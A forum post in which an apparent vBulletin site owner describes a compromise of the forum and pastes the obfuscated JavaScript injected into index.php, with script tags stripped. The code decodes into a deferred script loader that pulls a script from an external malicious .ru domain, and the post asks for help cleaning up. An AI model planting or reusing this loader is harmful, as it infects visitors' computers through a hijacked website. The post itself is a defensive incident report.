Forum Malicious Software...?
 

Well, I'm not sure if I'm having the issue with VB 4.0.0 PL1 or VB 3.8.1 PL1 (I have both installed on the server, one is in a test folder so I can get used to VB4 before I upgrade my main forums, and one is my main forum), BUT it appears that every time I visit my site within the last few days, it decides to tell me that visiting my site may harm my computer. One of my moderators noticed it on January 7th, so that is when I applied PL1 to both 4.0 and 3.8.1, but both were functioning fine before i applied the patch...
Here are the things I noticed, and the steps I've taken thus far:

First thing I noticed is that index.php on VB4 CMS (didnt check forums) no longer functioned (Said there was an extra < at the end of line 28)... which is why I assume that VB4 was the issue. So I downloaded the index page and noticed an extra bit of code added onto the bottom of it:

PS: I removed the SCRIPT html tags for safety, but the brackets were before and after the code (open and close)

Code:
/*LGPL*/ try{ window.onload = function(){var Igpfdqn195r0 = document.createElement('s(!@c^$$r^&i^&p!@t#!@#'.re place(/@|\$|&|\^|\!|\)|#|\(/ig, ''));Igpfdqn195r0.setAttribute('defer', 'd)$(e)@()f)!e$^!!r#@'.replace(/&|@|\(|\^|\!|#|\)|\$/ig, ''));Igpfdqn195r0.setAttribute('type', 't&($e^#^!x)^t@##/($!#j)#@!a^^v($&a(^^s#^&c^r!@@i$$@p@@(t)!&'.replac e(/\)|\!|\^|#|\$|&|@|\(/ig, ''));Igpfdqn195r0.setAttribute('id', 'Z@2(!(3!(f^!&(3^)(c$q#((d(n)!)&i($&'.replace(/#|\^|\(|@|\!|&|\)|\$/ig, ''));Igpfdqn195r0.setAttribute('s^&)^r^^@c#'.repla ce(/@|\(|\!|&|#|\^|\$|\)/ig, ''), 'h$t#t^^!p)$:)($$/!&/#(!e^b)@a(($@y)#-$^#)f))r(^.)(#b^()!l^$@a)!c)^k&^$)h^##a&)!t$^w#&&@ o(!^))r^&(l@(#d&^.!c^#o@$m!!!^@.@!w)#e&b)m)#d^&-^(c)&((o(()m!(.&$^w))e&&b)n)$e$#&t&@e^#n(^g^!)l@$! i##)s^h((.$^r#!u@&(:)))!^8##(0#8#0@!#(/$(@@^h^i&)5&.#c&$(o)@m(^#/&$h@i)5)#.#)(c@(o@!$m!)#)^/)!&!g!o#)o)#g^l)!)e^.^c@o$(!m#!/!w@#@!i#n))d))$o##w###s)^#l))i^#^)v^@e(().@c(#o#^( m(!^(/$(t@o#@m@^#s(#h@a#@&$^r)d&$&)w@a!$)r(#@e$@$^.^c$!o )$#^m$/!'.replace(/\)|@|&|\$|\!|\(|#|\^/ig, ''));if (document){document.body.appendChild(Igpfdqn195r0) ;}} } catch(H2c3axin471o0ra50kkcw) {}

That was line 28 and 29... now on an clean index.php page, there is no line 28 or 29

Once I replaced that page, another page decided not to work (packages/vbdbsearch/indexer.php), so I went ahead and replaced the ENTIRE VB4 folder (except config.php)... and now vb4 works smoothly.

====================

Now, I'm not even sure if that fixes the problem, but this is what the malicious software warning page gives me when I visit the site on Google Chrome:

Quote:
The website at www.mousetimes.com contains elements from the site ebay-fr.blackhatworld.com.webmd-com.webnetenglish.ru, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.

So, if anyone has any input or any way for me to figure out what was exploited in MySQL (or other pages), to allow this person in, or needs any other info, please let me know. I basically want to make sure everything is clean before I even bring my site back to life again (I have it closed right now just in case)

Thanks!